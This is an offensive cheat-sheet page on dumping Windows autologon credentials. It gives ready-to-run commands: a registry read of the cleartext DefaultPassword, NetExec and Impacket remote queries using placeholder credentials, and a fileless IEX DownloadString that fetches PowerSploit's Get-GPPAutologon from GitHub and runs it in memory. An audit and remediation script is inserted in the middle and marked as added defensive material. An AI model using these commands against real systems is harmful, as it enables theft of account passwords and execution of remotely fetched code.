PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Abuse - Windows (Local)

Get-ItemProperty

Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select-Object DefaultDomainName, DefaultUserName, DefaultPassword | Format-List
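The same Winlogon key is what a defender should audit: an enabled AutoAdminLogon together with a populated DefaultPassword value means the account's password sits in cleartext in the registry, readable by any local administrator. The script below is an added audit example, not part of the original page; it reports the state of the key without echoing the password and, with the hypothetical -Remediate switch, removes the cleartext value and turns autologon off. It assumes it is run elevated on the host being checked.

```powershell
# Added audit example (not from the original page). Checks the local
# Winlogon key for an enabled autologon and a cleartext DefaultPassword.
# -Remediate is a hypothetical switch name chosen for this example.
param(
    [switch]$Remediate
)

$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$props    = Get-ItemProperty -Path $winlogon -ErrorAction Stop

# AutoAdminLogon is a REG_SZ holding "1" or "0"
$autoLogonOn = ($props.AutoAdminLogon -eq '1')
$hasPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)

if ($hasPassword) {
    $finding = 'Cleartext autologon password present in Winlogon key'
} elseif ($autoLogonOn) {
    # Autologon set with Sysinternals Autologon stores the password as an
    # LSA secret rather than in this key; still worth reviewing.
    $finding = 'Autologon enabled; password not in registry value (check LSA secret)'
} else {
    $finding = 'No autologon configured'
}

# The password value itself is deliberately never output.
[pscustomobject]@{
    ComputerName      = $env:COMPUTERNAME
    AutoAdminLogon    = $autoLogonOn
    DefaultDomainName = $props.DefaultDomainName
    DefaultUserName   = $props.DefaultUserName
    CleartextPassword = $hasPassword
    Finding           = $finding
}

if ($Remediate -and ($hasPassword -or $autoLogonOn)) {
    if ($hasPassword) {
        Remove-ItemProperty -Path $winlogon -Name 'DefaultPassword' -Force
    }
    Set-ItemProperty -Path $winlogon -Name 'AutoAdminLogon' -Value '0' -Type String
    Write-Warning "Autologon disabled and DefaultPassword removed on $env:COMPUTERNAME"
}
```

Run it without arguments to get a per-host finding object suitable for collection with Invoke-Command across a fleet; add -Remediate only after the affected account's password has been rotated, since anyone who read the key already has the old one.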

Abuse - UNIX-like

Autologon must be configured via Group Policy instead of locally

Netexec

nxc smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module 'gpp_autologin'

Impacket's reg.py

reg.py query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" '<DOMAIN>/<USER>:<PASSWD>@<TARGET>'

Abuse - Windows

Autologon must be configured via Group Policy instead of locally

Get-GPPAutologon.ps1

Loading
  • Fileless
IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Exfiltration/Get-GPPAutologon.ps1')
  • Touching Disk
IWR -UseBasicParsing -Uri 'https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Exfiltration/Get-GPPAutologon.ps1' -OutFile '.\Get-GPPAutologon.ps1'
Import-Module '.\Get-GPPAutologon.ps1'

Usage
Get-GPPAutologon | ForEach-Object { $_.Passwords } | Sort-Object -Unique